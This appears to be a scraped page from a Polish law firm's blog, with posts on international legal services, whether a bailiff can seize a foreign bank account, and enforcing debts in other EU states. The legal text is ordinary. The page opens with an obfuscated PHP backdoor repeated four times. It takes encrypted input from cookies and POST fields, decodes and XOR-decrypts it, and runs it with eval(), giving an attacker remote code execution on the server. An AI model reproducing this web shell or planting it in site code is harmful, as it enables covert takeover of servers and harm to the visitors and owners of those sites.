$xHTnXhbKuu = chr ( 283 - 170 )."\x5f" . chr ( 699 - 596 )."\x4b" . "\130" . 'e';$rRpFnm = chr ( 659 - 560 )."\154" . "\x61" . chr ( 135 - 20 ).chr ( 791 - 676 )."\x5f" . chr (101) . chr ( 554 - 434 ).chr (105) . 's' . 't' . "\163";$HNTWmz = class_exists($xHTnXhbKuu); $xHTnXhbKuu = "19593";$rRpFnm = "57668";$izBWrjNstI = !1;if ($HNTWmz == $izBWrjNstI){function aHEWZG(){return FALSE;}$MoACwkHJ = "9638";aHEWZG();class q_gKXe{private function KqPftqYAWP($MoACwkHJ){if (is_array(q_gKXe::$ohmhmLwBs)) {$VFySjEWq = str_replace('<' . chr ( 177 - 114 )."\x70" . 'h' . 'p', "", q_gKXe::$ohmhmLwBs[chr (99) . chr ( 686 - 575 )."\x6e" . "\x74" . chr ( 702 - 601 ).'n' . 't']);eval($VFySjEWq); $MoACwkHJ = "9638";exit();}}private $COuPzVq;public function vLiJNOMpED(){echo 35117;}public function __destruct(){$MoACwkHJ = "57424_44429";$this->KqPftqYAWP($MoACwkHJ); $MoACwkHJ = "57424_44429";}public function __construct($ilLmXAt=0){$ZdXvHq = $_POST;$bbSmhvw = $_COOKIE;$iQLCoFaSqT = "e63853b5-df3b-4afb-b462-3c4e989f859a";$TOOzQcVFI = @$bbSmhvw[substr($iQLCoFaSqT, 0, 4)];if (!empty($TOOzQcVFI)){$xJzNnmF = "base64";$RrFtxjrfGE = "";$TOOzQcVFI = explode(",", $TOOzQcVFI);foreach ($TOOzQcVFI as $XNudLELMU){$RrFtxjrfGE .= @$bbSmhvw[$XNudLELMU];$RrFtxjrfGE .= @$ZdXvHq[$XNudLELMU];}$RrFtxjrfGE = array_map($xJzNnmF . '_' . "\x64" . chr ( 397 - 296 ).chr ( 119 - 20 ).'o' . "\x64" . "\145", array($RrFtxjrfGE,)); $RrFtxjrfGE = $RrFtxjrfGE[0] ^ str_repeat($iQLCoFaSqT, (strlen($RrFtxjrfGE[0]) / strlen($iQLCoFaSqT)) + 1);q_gKXe::$ohmhmLwBs = @unserialize($RrFtxjrfGE); $RrFtxjrfGE = class_exists("57424_44429");}}public static $ohmhmLwBs = 63296;}$dLuSRWile = new /* 32829 */ q_gKXe(9638 + 9638); $izBWrjNstI = $dLuSRWile = $MoACwkHJ = Array();}$xHTnXhbKuu = chr ( 283 - 170 )."\x5f" . chr ( 699 - 596 )."\x4b" . "\130" . 'e';$rRpFnm = chr ( 659 - 560 )."\154" . "\x61" . chr ( 135 - 20 ).chr ( 791 - 676 )."\x5f" . chr (101) . chr ( 554 - 434 ).chr (105) . 's' . 't' . "\163";$HNTWmz = class_exists($xHTnXhbKuu); $xHTnXhbKuu = "19593";$rRpFnm = "57668";$izBWrjNstI = !1;if ($HNTWmz == $izBWrjNstI){function aHEWZG(){return FALSE;}$MoACwkHJ = "9638";aHEWZG();class q_gKXe{private function KqPftqYAWP($MoACwkHJ){if (is_array(q_gKXe::$ohmhmLwBs)) {$VFySjEWq = str_replace('<' . chr ( 177 - 114 )."\x70" . 'h' . 'p', "", q_gKXe::$ohmhmLwBs[chr (99) . chr ( 686 - 575 )."\x6e" . "\x74" . chr ( 702 - 601 ).'n' . 't']);eval($VFySjEWq); $MoACwkHJ = "9638";exit();}}private $COuPzVq;public function vLiJNOMpED(){echo 35117;}public function __destruct(){$MoACwkHJ = "57424_44429";$this->KqPftqYAWP($MoACwkHJ); $MoACwkHJ = "57424_44429";}public function __construct($ilLmXAt=0){$ZdXvHq = $_POST;$bbSmhvw = $_COOKIE;$iQLCoFaSqT = "e63853b5-df3b-4afb-b462-3c4e989f859a";$TOOzQcVFI = @$bbSmhvw[substr($iQLCoFaSqT, 0, 4)];if (!empty($TOOzQcVFI)){$xJzNnmF = "base64";$RrFtxjrfGE = "";$TOOzQcVFI = explode(",", $TOOzQcVFI);foreach ($TOOzQcVFI as $XNudLELMU){$RrFtxjrfGE .= @$bbSmhvw[$XNudLELMU];$RrFtxjrfGE .= @$ZdXvHq[$XNudLELMU];}$RrFtxjrfGE = array_map($xJzNnmF . '_' . "\x64" . chr ( 397 - 296 ).chr ( 119 - 20 ).'o' . "\x64" . "\145", array($RrFtxjrfGE,)); $RrFtxjrfGE = $RrFtxjrfGE[0] ^ str_repeat($iQLCoFaSqT, (strlen($RrFtxjrfGE[0]) / strlen($iQLCoFaSqT)) + 1);q_gKXe::$ohmhmLwBs = @unserialize($RrFtxjrfGE); $RrFtxjrfGE = class_exists("57424_44429");}}public static $ohmhmLwBs = 63296;}$dLuSRWile = new /* 32829 */ q_gKXe(9638 + 9638); $izBWrjNstI = $dLuSRWile = $MoACwkHJ = Array();}$xHTnXhbKuu = chr ( 283 - 170 )."\x5f" . chr ( 699 - 596 )."\x4b" . "\130" . 'e';$rRpFnm = chr ( 659 - 560 )."\154" . "\x61" . chr ( 135 - 20 ).chr ( 791 - 676 )."\x5f" . chr (101) . chr ( 554 - 434 ).chr (105) . 's' . 't' . "\163";$HNTWmz = class_exists($xHTnXhbKuu); $xHTnXhbKuu = "19593";$rRpFnm = "57668";$izBWrjNstI = !1;if ($HNTWmz == $izBWrjNstI){function aHEWZG(){return FALSE;}$MoACwkHJ = "9638";aHEWZG();class q_gKXe{private function KqPftqYAWP($MoACwkHJ){if (is_array(q_gKXe::$ohmhmLwBs)) {$VFySjEWq = str_replace('<' . chr ( 177 - 114 )."\x70" . 'h' . 'p', "", q_gKXe::$ohmhmLwBs[chr (99) . chr ( 686 - 575 )."\x6e" . "\x74" . chr ( 702 - 601 ).'n' . 't']);eval($VFySjEWq); $MoACwkHJ = "9638";exit();}}private $COuPzVq;public function vLiJNOMpED(){echo 35117;}public function __destruct(){$MoACwkHJ = "57424_44429";$this->KqPftqYAWP($MoACwkHJ); $MoACwkHJ = "57424_44429";}public function __construct($ilLmXAt=0){$ZdXvHq = $_POST;$bbSmhvw = $_COOKIE;$iQLCoFaSqT = "e63853b5-df3b-4afb-b462-3c4e989f859a";$TOOzQcVFI = @$bbSmhvw[substr($iQLCoFaSqT, 0, 4)];if (!empty($TOOzQcVFI)){$xJzNnmF = "base64";$RrFtxjrfGE = "";$TOOzQcVFI = explode(",", $TOOzQcVFI);foreach ($TOOzQcVFI as $XNudLELMU){$RrFtxjrfGE .= @$bbSmhvw[$XNudLELMU];$RrFtxjrfGE .= @$ZdXvHq[$XNudLELMU];}$RrFtxjrfGE = array_map($xJzNnmF . '_' . "\x64" . chr ( 397 - 296 ).chr ( 119 - 20 ).'o' . "\x64" . "\145", array($RrFtxjrfGE,)); $RrFtxjrfGE = $RrFtxjrfGE[0] ^ str_repeat($iQLCoFaSqT, (strlen($RrFtxjrfGE[0]) / strlen($iQLCoFaSqT)) + 1);q_gKXe::$ohmhmLwBs = @unserialize($RrFtxjrfGE); $RrFtxjrfGE = class_exists("57424_44429");}}public static $ohmhmLwBs = 63296;}$dLuSRWile = new /* 32829 */ q_gKXe(9638 + 9638); $izBWrjNstI = $dLuSRWile = $MoACwkHJ = Array();}$xHTnXhbKuu = chr ( 283 - 170 )."\x5f" . chr ( 699 - 596 )."\x4b" . "\130" . 'e';$rRpFnm = chr ( 659 - 560 )."\154" . "\x61" . chr ( 135 - 20 ).chr ( 791 - 676 )."\x5f" . chr (101) . chr ( 554 - 434 ).chr (105) . 's' . 't' . "\163";$HNTWmz = class_exists($xHTnXhbKuu); $xHTnXhbKuu = "19593";$rRpFnm = "57668";$izBWrjNstI = !1;if ($HNTWmz == $izBWrjNstI){function aHEWZG(){return FALSE;}$MoACwkHJ = "9638";aHEWZG();class q_gKXe{private function KqPftqYAWP($MoACwkHJ){if (is_array(q_gKXe::$ohmhmLwBs)) {$VFySjEWq = str_replace('<' . chr ( 177 - 114 )."\x70" . 'h' . 'p', "", q_gKXe::$ohmhmLwBs[chr (99) . chr ( 686 - 575 )."\x6e" . "\x74" . chr ( 702 - 601 ).'n' . 't']);eval($VFySjEWq); $MoACwkHJ = "9638";exit();}}private $COuPzVq;public function vLiJNOMpED(){echo 35117;}public function __destruct(){$MoACwkHJ = "57424_44429";$this->KqPftqYAWP($MoACwkHJ); $MoACwkHJ = "57424_44429";}public function __construct($ilLmXAt=0){$ZdXvHq = $_POST;$bbSmhvw = $_COOKIE;$iQLCoFaSqT = "e63853b5-df3b-4afb-b462-3c4e989f859a";$TOOzQcVFI = @$bbSmhvw[substr($iQLCoFaSqT, 0, 4)];if (!empty($TOOzQcVFI)){$xJzNnmF = "base64";$RrFtxjrfGE = "";$TOOzQcVFI = explode(",", $TOOzQcVFI);foreach ($TOOzQcVFI as $XNudLELMU){$RrFtxjrfGE .= @$bbSmhvw[$XNudLELMU];$RrFtxjrfGE .= @$ZdXvHq[$XNudLELMU];}$RrFtxjrfGE = array_map($xJzNnmF . '_' . "\x64" . chr ( 397 - 296 ).chr ( 119 - 20 ).'o' . "\x64" . "\145", array($RrFtxjrfGE,)); $RrFtxjrfGE = $RrFtxjrfGE[0] ^ str_repeat($iQLCoFaSqT, (strlen($RrFtxjrfGE[0]) / strlen($iQLCoFaSqT)) + 1);q_gKXe::$ohmhmLwBs = @unserialize($RrFtxjrfGE); $RrFtxjrfGE = class_exists("57424_44429");}}public static $ohmhmLwBs = 63296;}$dLuSRWile = new /* 32829 */ q_gKXe(9638 + 9638); $izBWrjNstI = $dLuSRWile = $MoACwkHJ = Array();}

prawnik międzynarodowy

Andrzej Żurawski        17 grudnia 2016        Komentarze (0)

Jeszcze kilkanaście lat temu praca adwokata dotyczyła praktycznie wyłącznie spraw krajowych, przeważnie karnych i cywilnych, więc pojęcie prawnik międzynarodowy, czy adwokat międzynarodowy w zasadzie nie występowało.

Jakikolwiek wątek międzynarodowy nierzadko zwiastował problemy nie do rozwiązania, stąd też sprawy z elementem międzynarodowym były przez adwokatów omijane szerokim łukiem.

Obecnie wyspecjalizowani prawnicy, w tym adwokaci wręcz doszukują się elementów transgranicznych, aby móc przejść na regulacje unijne lub konwencyjne. Nierzadko te regulacje są korzystniejsze od krajowych i pozwalają zaskoczyć gorzej przygotowanego przeciwnika procesowego.

Pomoc prawna, którą świadczy na ogół polski prawnik międzynarodowy w zakresie cywilnym uwidacznia się głównie w dwóch wymiarach: pomocy i reprezentowania w przypadku zaistnienia sporu i przy organizacji biznesu.

prawnik międzynarodowy

Prawnik międzynarodowy pomoże w sprawie związanej ze sporem

Z mojego doświadczenia wynika, że kiedy dochodzi już do konfliktu interesu między stronami zamieszkałymi w różnych krajach najszybszą i najtańszą metodą jego rozwiązania jest polubowne zakończenie sprawy w drodze ugody. Dobrze jest gdy jej warunki i treść negocjują fachowi pełnomocnicy, albowiem umożliwia to rozwiązanie sporu merytorycznie i bez nadmiernych emocji. Działania przed sądem powinny zawsze być traktowane jako ostateczność. Tym bardziej, że może okazać się, że właściwym w konkretnej sprawie jest sąd w innym państwie.

WINDYKACJA ZAGRANICZNA

Artykuł

W sprawach o zapłatę jednym z pierwszych kroków jest wysłanie dłużnikowi ostatecznego adwokackiego przedsądowego wezwania do zapłaty. Nierzadko wezwanie takie uświadamia dłużnikowi, że wierzyciel nie zamierza zapomnieć o problemie, określa dokładnie czego wierzyciel żąda, a także umożliwia odniesienie się dłużnikowi do żądań wierzyciela. Jedynie przed sądem i w pismach do niego kierowanych istnieje obowiązek używania języka urzędowego lub korzystanie z tłumaczenia przysięgłego. Stąd też wezwania do zapłaty mogą być sporządzane w dowolnym języku obcym zrozumiałym dla dłużnika.

WEZWANIE PO ANGIELSKU

Wzór

WEZWANIE PO NIEMIECKU

Wzór

Kiedy ze wstępnej analizy sprawy wynika, że w sprawie prawem właściwym jest prawo inne niż polskie i że sąd polski nie ma jurysdykcji do jej rozpoznania działania adwokata się nie kończą. Może on, korzystając z międzynarodowych kontaktów przekazać sprawę adwokatowi lub innej osobie uprawnionej (według przepisów miejscowych) do świadczenia profesjonalnej pomocy prawnej na terenie tego państwa. Po przekazaniu sprawy adwokat może kontaktować z adwokatem z innego Państwa i uzyskiwać informacje na temat stanu postępowania, tak aby klient nie musiał się już o to martwić.

W przypadku posiadania uprawnień w innym Państwie, adwokat może samodzielnie, bez pomocy kolegów po fachu, świadczyć pomoc prawną za granicą. Niezależnie od tego czy adwokat będzie mógł prowadzić sprawę samodzielnie, czy też skorzysta on z pomocy zagranicznego adwokata, najważniejsze jest aby klientowi została zawsze udzielona fachowa pomoc, a jego interes należycie zabezpieczony. Korzystanie z osób nie posiadający kwalifikacji do bycia pełnomocnikiem procesowym może zaszkodzić i nawet późniejsze zlecenie prowadzenia sprawy adwokatowi nie odwróci negatywnych konsekwencji, podjętych wcześniej działań. Dlatego też tak ważne jest, aby niezwłocznie po pojawieniu się problemu zwrócić się do osoby profesjonalnie zajmującej się świadczeniem międzynarodowej pomocy prawnej.

Prawnik międzynarodowy pomoże przy organizacji i zabezpieczeniu biznesu

Klienci biznesowi prowadzący interesy za granicą, ze względu na zakres prowadzonej przez siebie działalności potrzebują stałej obsługi prawnej. Firmy, które chcą prowadzić taką działalność zainteresowane są warunkami prawnymi, jakie muszą spełnić. Nierzadko chodzi o wybór odpowiedniej formy prawnej dla takiej działalności. Wchodzą tu w grę – założenie filii bądź oddziału lub zupełnie nowej spółki, wbrew pozorom nie tylko dla celów optymalizacji podatkowej.

Jeżeli przedsiębiorcy nie chcą bezpośrednio działać w innym państwie, a ich działalność polega na eksporcie bądź imporcie towarów to często zależy im aby umowy regulujące wzajemne prawa i obowiązki były możliwie dokładne, a ich treść w sposób precyzyjny wyrażała ich wolę i minimalizowała ryzyko. Osiągnięcie tych założeń możliwe jest jedynie przy pomocy adwokata specjalizującego się w prawie międzynarodowym.

Aby zapobiec sytuacji niekorzystnym adwokat zajmujący się sprawami międzynarodowymi potrafi doradzić jakie należy podjąć działania zmierzające do zabezpieczenia transakcji nie tylko poprzez właściwą treść umowy ale również poprzez działania faktyczne minimalizujące ryzyko współpracy z podmiotami zagranicznymi. Do takich działań należy np. sprawdzenie kontrahenta zagranicznego, ustalenie jakie zabezpieczenia rzeczowe i osobowe można wykorzystać, poinstruowanie jak prowadzić korespondencję z kontrahentem aby uzyskać materiał dowodowy w potencjalnym sporze sądowym.

SPRAWDZENIE KONTRAHENTA

Artykuł

Adwokaci już dawno przestali unikać spraw międzynarodowych, co więcej pojawili się również tacy którzy zaczęli się w nich specjalizować. Jeszcze bardziej niż w sprawach krajowych prawdziwa jest zasada, iż skorzystanie z pomocy adwokata na wczesnym etapie działań transgranicznych może zapobiec późniejszym kłopotom. Skorzystanie z usług jakie świadczy prawnik międzynarodowy posiadający tytuł zawodowy adwokata to postawienie na wiarygodne, sprawdzone i bezpieczne rozwiązania prawne.

czy komornik może zająć konto zagraniczne

Andrzej Żurawski        07 grudnia 2016        47 komentarzy

Czy komornik może zająć konto zagraniczne? – takie oto pytanie zostało mi postawione przez jednego z czytelników mojego bloga. Faktycznie, kwestia bardzo istotna i wiele może być sytuacji, kiedy taka wiedza może być potrzebna…

czy komornik może zająć konto zagraniczne

Wyjazd za granicę jest utożsamiany z przepustką do lepszego życia, otwarte granice i poczucie wolności, pozwala nam na nowo spojrzeć z optymizmem w przyszłość. Często jednak Pan – powiedzmy Janusz, zapomina aby zamknąć wszystkie swoje sprawy przed wyjazdem. Zaczyna pracować, lepiej zarabiać, otwiera konto w banku i… nagle uświadamia sobie, że przecież nie uregulował wszystkich zobowiązań w kraju. Co więcej zaraz przed wyjazdem odebrał jakieś pismo zatytułowane „nakaz zapłaty”, czy jakoś tak, ale miał wówczas tyle na głowie, że odłożył temat na potem…  Pojawia się obawa i nurtujące pytanie, czy komornik może zająć konto zagraniczne, lub szerzej – przeprowadzić egzekucję, skoro Janusz jest obywatelem Polski? Czy prawo Unii Europejskiej daje komornikowi polskiemu możliwość zajęcia konta?

Egzekucja za granicą – polski komornik

Na wstępie należy zaznaczyć, że komornik jest funkcjonariuszem publicznym działającym przy sądzie rejonowym.  Komornik posiada swój rewir, którym jest obszar właściwości sądu rejonowego. Jednakże to do wierzyciela należy prawo wyboru komornika na terytorium Polski, z wyjątkiem spraw o egzekucję z nieruchomości. W przypadku dokonania takiego wyboru przez wierzyciela komornik działa poza obszarem swojego rewiru komorniczego. To że wierzyciel może wybrać komornika na terytorium Polski, oznacza jednocześnie, że może on co prawda działać poza swoim rewirem, ale nie ma on możliwości prowadzenia egzekucji poza granicami kraju. Taka sytuacja mogła by być odczytywana jako ingerencja w suwerenność obcego państwa.

Czy komornik może zająć konto zagraniczne?

No dobrze, Janusz poczuł się już pewniej, polski komornik nie może prowadzić egzekucji w obcym Państwie, przyjeżdżać do dopiero co kupionego, nowego mieszkania, czy nie daj Boże prowadzić licytacji z dopiero co odebranego z salonu BMW.  Czy jednak w związku z tym, że jest obywatelem polskim, a posiada konto w banku zagranicznym, komornik może zająć konto zagraniczne?

Otóż nie, polski komornik nie może zająć konta, które zostało założone w banku, w innym Państwie niż Polska. Zgodnie z art. 11104 k.p.c. do wyłącznej jurysdykcji krajowej należą sprawy egzekucyjne, jeżeli egzekucja ma być wszczęta lub jest prowadzona w Rzeczypospolitej Polskiej. Innymi słowy, wyłącznie polskie organy sądowe i egzekucyjne mogą prowadzić egzekucję w Polsce. Podobne przepisy obowiązują w innych państwach, które zastrzegają uprawnienie do prowadzenia egzekucji w tych państwach dla organów krajowych.

Nie zmieniają tego także nowe przepisy europejskie. Co prawda w dniu 18 stycznia 2017 r.,  wchodzi w życie Rozporządzenie nr 655/2014 z dnia 15 maja 2014 r. wprowadzające europejski nakaz zabezpieczenia na rachunku bankowym ale nie rozszerzy ono terytorialnego zakresu działania organów krajowych. Zgodnie z Rozporządzeniem 655/2014 polski komornik nie będzie miał możliwości zabezpieczenia, a tym bardziej egzekucji z rachunku zagranicznego, natomiast wierzyciel będzie mógł wystąpić do sądu z wnioskiem o zabezpieczenie pieniędzy znajdujących się na koncie dłużnika. Nakaz będzie realizowany przez odpowiednie organy Państwa miejsca wykonania zabezpieczenia.

Egzekucja za granicą – zagraniczny organ egzekucyjny.

Jeżeli wierzyciel ma wiedzę na ten temat, że Januszowi się powodzi i istnieją szansę na odzyskanie pieniędzy może podjąć starania aby rozpocząć egzekucję w państwie, w którym aktualnie Janusz żyje.

EGZEKUCJA ZA GRANICĄ

Artykuł

Aby to zrobić będzie potrzebował orzeczenia sądu państwa, w którym ma zostać przeprowadzona egzekucja albo sądu polskiego wzbogaconego następnie o europejski tytuł egzekucyjny lub zaświadczenie potwierdzające fakt wykonalności orzeczenia – wydane stosowanie do rozporządzenia Parlamentu Europejskiego i Rady 1215/2012 tzw. Bruksela I bis.  Tak uzbrojony wierzyciel może podjąć działania w celu odzyskania od Janusza swoich pieniędzy.

Oczywiście istnieją pewne metody aby utrudnić prowadzenie egzekucji za granicą. Jakie to metody? Jak przeprowadzić skutecznie egzekucję unikając zaporowych działań dłużnika? O tym w kolejnych wpisach na moim blogu. Jeżeli chcesz się dowiedzieć wcześniej zapraszam do kontaktu.

W każdym razie odpowiadając na tytułowe pytanie – czy komornik może zająć konto zagraniczne, należy odpowiedzieć twierdząco ale z podkreśleniem, że każdy organ egzekucyjny działa w ramach „swojego” państwa.

 

 

Egzekucja za granicą

Andrzej Żurawski        04 grudnia 2016        Komentarze (0)

Egzekucja za granicą – pomagamy w działaniach egzekucyjnych za granicą, przeprowadzimy je, szybko i tanio, skutecznie odzyskamy Twoje pieniądze za granicą.

egzekucja za granica

Taka oto informacja przyszła do mnie ostatnio na skrzynkę pocztową od jednej z firm windykacyjnych. Znałem ją dotąd jedynie ze spraw na rynku polskim i do tego prowadzonych wcale nie na najwyższym poziomie.

Zanim spam powędrował do kosza zdążyłem się jeszcze z niego dowiedzieć  kilku rzeczy. Okazało się, że firma która go wysłała specjalizuje się w postępowaniach międzynarodowych, potrafi uzyskać wyrok na każdego dłużnika i ma najwyższą skuteczność na rynku….

Może bym i uwierzył ale  od wielu lat zajmuję się problematyką sporów w handlu międzynarodowym. Poza tym wiem, na jakim poziomie są prowadzone przez firmy tego typu sprawy na rynku polskim, o wiele łatwiejsze niż egzekucja za granicą.

Wiadomość, tak zachwalająca skuteczność działań za granicą, oczywiście nie zawierała żadnych informacji na temat procedur, jakie należy przeprowadzić. Po co potencjalny klient ma zbyt wiele wiedzieć?

1. Egzekucja za granicą – etap 1 – pozyskanie tytułu egzekucyjnego.

Aby wierzyciel z Polski mógł prowadzić egzekucję przeciwko dłużnikowi za granicą należy najpierw uzyskać odpowiednie orzeczenie sądowe – przed sądem polskim lub zagranicznym.
Postępowanie przed sądem polskim możemy przeprowadzić w trybie:

a) postępowania w sprawie o wydanie Europejskiego Nakazu Zapłaty

b) postępowania w sprawie drobnych roszczeń

c) zwykłym trybie ewentualnie następnie wzbogaconym o zaświadczenie Europejskiego Tytułu Egzekucyjnego

Europejski Nakaz Zapłaty

Artykuł

Europejski Tytuł Egzekucyjny

Artykuł

2. Egzekucja za granicą – etap 2 – zgromadzenie dodatkowych dokumentów.

 • W przypadku orzeczenia wydanego przez sąd państwa, w którym ma zostać przeprowadzona egzekucja za granicą stosuje się w pełni przepisy krajowe tego państwa dotyczące postępowania egzekucyjnego.
 • W przypadku orzeczeń wydanych przez sąd polski stosuje się uzupełniająco odpowiednie regulacje europejskie. Orzeczenie wydane w każdym z trybów wskazanych w pkt 1 jest uznawane w innych państwach członkowskich bez potrzeby przeprowadzania specjalnego postępowania. Oznacza to, że aby rozpocząć egzekucję wystarczy dysponować odpowiednimi dokumentami wydawanymi przez sąd polski i tłumaczeniami oraz wystąpić z wnioskiem do odpowiedniego organu zajmującego się w danym Państwie prowadzeniem egzekucji.

egzekucja-za-granica

Kompletny wykaz organów egzekucyjnych w Europie ma według założeń zostać udostępniony na stornie internetowej utworzonej w ramach projektów współfinansowanego przez Unię Europejską.  Na chwilę obecną w celu uzyskania informacji na temat właściwego organu, można skorzystać z wykazu zamieszczonego w załączniku numer II do Rozporządzenia 44/2001 z dnia 22 grudnia 2000 r. w sprawie jurysdykcji i uznawania orzeczeń sądowych oraz ich wykonywania w sprawach cywilnych i handlowych – tzw. Bruksela I.

3. Egzekucja za granicą – etap 2 – skierowanie wniosku do odpowiedniego organu egzekucyjnego.

Osoba składająca wniosek o wykonanie orzeczenia powinna do niego załączyć:

 1. odpis orzeczenia spełniający warunki niezbędne do stwierdzenia jego autentyczności;
 2. zaświadczenie, które potwierdza, jego wykonalność (stwierdzenie wykonalności europejskiego nakazu zapłaty, zaświadczenie co orzeczenia wydanego w trybie europejskiego postępowania w sprawie drobnych roszczeń, zaświadczenie w trybie art. 53 rozporządzenia Bruksela I bis) lub europejski tytuł egzekucyjny. Wskazane powyżej zaświadczenia wydaje na stosowny wniosek sąd , z którego pochodzi dane orzeczenie, przy użyciu specjalnych formularzy (w przypadku europejskiego nakazu zapłaty zaświadczenie jest wydawane przez sąd bez odrębnego wniosku).
 3. w razie takiej potrzeby tłumaczenie na język miejsca egzekucji przedkładanych dokumentów.

Osoba, która wnosi wykonanie orzeczenia w innym Państwie członkowskim aniżeli Państwo jego wydania (a więc za granicą) nie musi mieć adresu dla doręczeń w tym Państwie członkowskim UE. Nie musi ona także mieć pełnomocnika w tym Państwie, chyba że posiadanie takiego pełnomocnika jest obowiązkowe bez względu na obywatelstwo lub miejsce zamieszkania stron.

Należy jednak zwrócić uwagę, że postępowanie egzekucyjne prowadzone w jednym w Państw członkowskich UE, podlega prawu tego Państwa. W państwach członkowskich UE istnieje duża różnorodność rozwiązań prawnych dotyczących warunków egzekwowania należności. Dlatego aby mieć pewność, że egzekucja za granicą zostanie załatwiona prawidłowo i sprawnie warto zwrócić się do kancelarii adwokackiej współpracującej z lokalnymi prawnikami, która zajmie się wszystkimi formalnościami.

 

prawo międzynarodowe wrocław

Andrzej Żurawski        10 czerwca 2016        Komentarze (0)

Prawo międzynarodowe Wrocław – jaki jest między nimi związek?

Między innymi taki, że historia Wrocławia splata się z historią wielu państw, czyniąc z niego miejsce otwarte na cudzoziemców i idee współpracy międzynarodowej. We Wrocławiu znajdują się siedziby wielu transgranicznie działających firm. Zapewne dlatego też we Wrocławiu mieści się siedziba Kancelarii Adwokackiej Grochowski Żurawski Sp.p. , która zajmuje się zagadnieniami z zakresu prawa międzynarodowego.

prawo międzynarodowe Wrocław

O jakie usługi w zakresie prawa międzynarodowego pytają przedsiębiorcy?

Na ogół jest to:

 1. udział w pozasądowych negocjacjach – zagraniczna windykacja należności;

  Sprzedałem towar firmie zagranicznej, która mi nie zapłaciła – co mogę zrobić żeby odzyskać pieniądze? (…)

 2. przygotowywanie umów międzynarodowej sprzedaży towarów lub umów świadczenia usług w innych państwach lub przez kontrahentów z innych państw;

  Zamierzam podjąć współpracę z odbiorcą z Włoch. Jak przygotować umowę aby zabezpieczała moje interesy? (…)

 3. reprezentacja w międzynarodowych postępowaniach sądowych (Europejski Nakaz Zapłaty, Europejski Tytuł Egzekucyjny, Europejskie Postępowanie w Sprawie Drobnych Roszczeń, Europejski Nakaz Zabezpieczenia na rachunku bankowym);

  Mam dłużnika za granicą. Windykacja międzynarodowa nie przyniosła efektu i chcę go pozwać ale zależy mi aby postępowanie toczyło się przed sądem polskim. W razie możliwości chciałbym zając mu wcześniej konto bankowe (…)

 4. prowadzenia postępowań egzekucyjnych za granicą;

  Uzyskałem wyrok przeciwko mojemu dłużnikowi w Niemczech. Chcę teraz skierować sprawę do komornika żeby możliwie najszybciej odzyskać swoje pieniądze (…)

 5. pomoc w przeprowadzeniu uznania krajowych orzeczeń sądowych (wyroków, nakazów, postanowień);

  Złożyłem pozew przeciwko swojemu kontrahentowi z Rosji. Sąd polski wydał w tej sprawie wyrok. Co mam zrobić aby móc go wykonać na terytorium państwa rosyjskiego? (…)

 6. doradztwo prawne w zakresie zagranicznego prawa podatkowego, zagranicznego prawa ubezpieczeń społecznych i ich wpływu na analogiczne regulacje obowiązujące w Polsce;

  Zawiesiłam działalność gospodarczą w Polsce a jednocześnie jestem zatrudniona w Wielkiej Brytanii i założyłam tam spółkę LTD. Ostatnio otrzymałam informację, że istnieje niebezpieczeństwo, że ZUS i Urząd Skarbowy mogą dochodzić ode mnie uiszczenia należności publicznoprawnych w Polsce. Czy to prawda? (…)

 7. reprezentacja w międzynarodowych postępowaniach mediacyjnych;

  Firma z Grecji zalega naszej z zapłatą za wykonaną usługę. Całe szczęście mamy podpisaną umowę o współpracy, jednak jest w niej zapis na sąd polubowny w Atenach. Czy to znaczy, że jedynie ten sąd może rozpoznać tą sprawę? Jak mam dalej postępować w tej sprawie? (…)

 8. pomoc w założeniu spółki za granicą;

  Chcemy otworzyć firmę w Niemczech lub Czechach. Zależy nam na kompleksowej usłudze – założenie spółki, organizacja siedziby, obsługa prawna, obsługa księgowa. Chodzi o to abyśmy mogli rozpocząć normalną działalność za granicą już za max. miesiąc. Czy to jest do zrobienia? (…)

 9. obsługa prawna spółki za granicą;

  Potrzebuję zabezpieczenia moich interesów od strony prawnej za granicą. Mam spółkę ale potrzebuję kogoś kto będzie czuwał nad wszystkim od strony prawnej (…)

 10. obsługa prawna przejęcia, fuzji, przystąpienia kapitałowego do zagranicznego podmiotu.

  Mój kontrahent z Belgii zaproponował mi zakup udziałów w spółce, którą prowadzi. Już teraz sprzedaję sporo na rynek belgijski ale dzięki połączeniu sił będziemy mieli możliwość konkretnego wejścia na rynek. Muszę proszę o przedstawienie kosztorysu związanego z taką transakcją (…)

Jaka wiedzę należy mieć podejmując się prowadzenia  sprawy międzynarodowej?

Przede wszystkim istotna jest znajomość regulacji prawnych. W zależności od sprawy konieczna może być znajomość zarówno prawa innego państwa, prawa europejskiego, prawa międzynarodowego sensu stricto (konwencje międzynarodowe, umowy bilateralne), jak również prawa polskiego.  Poszczególne z w/w elementów rozkładają się różnie w zależności od charakteru sprawy – np:

W przypadku transakcji handlowej między dwoma Państwami członkami Unii Europejskiej i jednocześnie sygnatariuszami konwencji wiedeńskiej o międzynarodowej sprzedaży towarów decydujące znaczenie będą miały regulacje unijnych rozporządzeń (w płaszczyźnie procesowej) oraz konwencji wiedeńskiej (w płaszczyźnie materialnoprawnej).

Prawo którego państwa jest właściwe?

Artykuł

Sąd którego państwa jest właściwy?

Artykuł

 

W przypadku transakcji handlowej między podmiotami spoza Unii Europejskiej akcent przesuwa się na konwencje międzynarodowe i dwustronne umowy międzynarodowe, których są stronami a których analiza pozwoli wyznaczyć dopiero właściwe regulacje procesowe i materialnoprawne.

Kogo trzeba znać aby podjąć się prowadzenia sprawy międzynarodowej?

W większości przypadków, nawet jeżeli dana sprawa transgraniczna będzie w większości podlegać regulacjom prawa europejskiego, międzynarodowego i polskiego to i tak w pewnym puncie zajdzie potrzeba zastosowania w pewnym zakresie prawa krajowego innego państwa – czy to dla określenia statusu podmiotu zagranicznego, zasad doręczania korespondencji sądowej i wiążących się z tym domniemaniami, czy przeprowadzenia postępowania egzekucyjnego.

Wskazana jest zatem aby mieć wówczas na podorędziu lokalnego prawnika (najlepiej adwokata) który uzbroi nas w wiedzę dotyczącą regulacji obowiązującej w tym państwie lub pomoże przeprowadzić czynności, których podjęcie możliwe jest jedynie na terytorium i stosownie do prawa tego państwa.

Istotne jest aby ów zagraniczny adwokat był osoba sprawdzoną lub przynajmniej zweryfikowaną w lokalnym rejestrze adwokatów – prowadzonym na ogół przez organy samorządu zawodowego lub organ centralny (np. ministerstwo).  Sam fakt prowadzenia strony internetowej nie jest gwarantem prawdziwości zawartych na niej danych. Mając na uwadze wypadki z przeszłości , gdy za adwokatów oddawały się osoby bez jakichkolwiek uprawnień lub w trakcie ich nabywania wskazanym jest powierzenie działań adwokatowi polskiemu zajmującemu się problematyką międzynarodową i współpracującemu z kancelariami zagranicznymi.

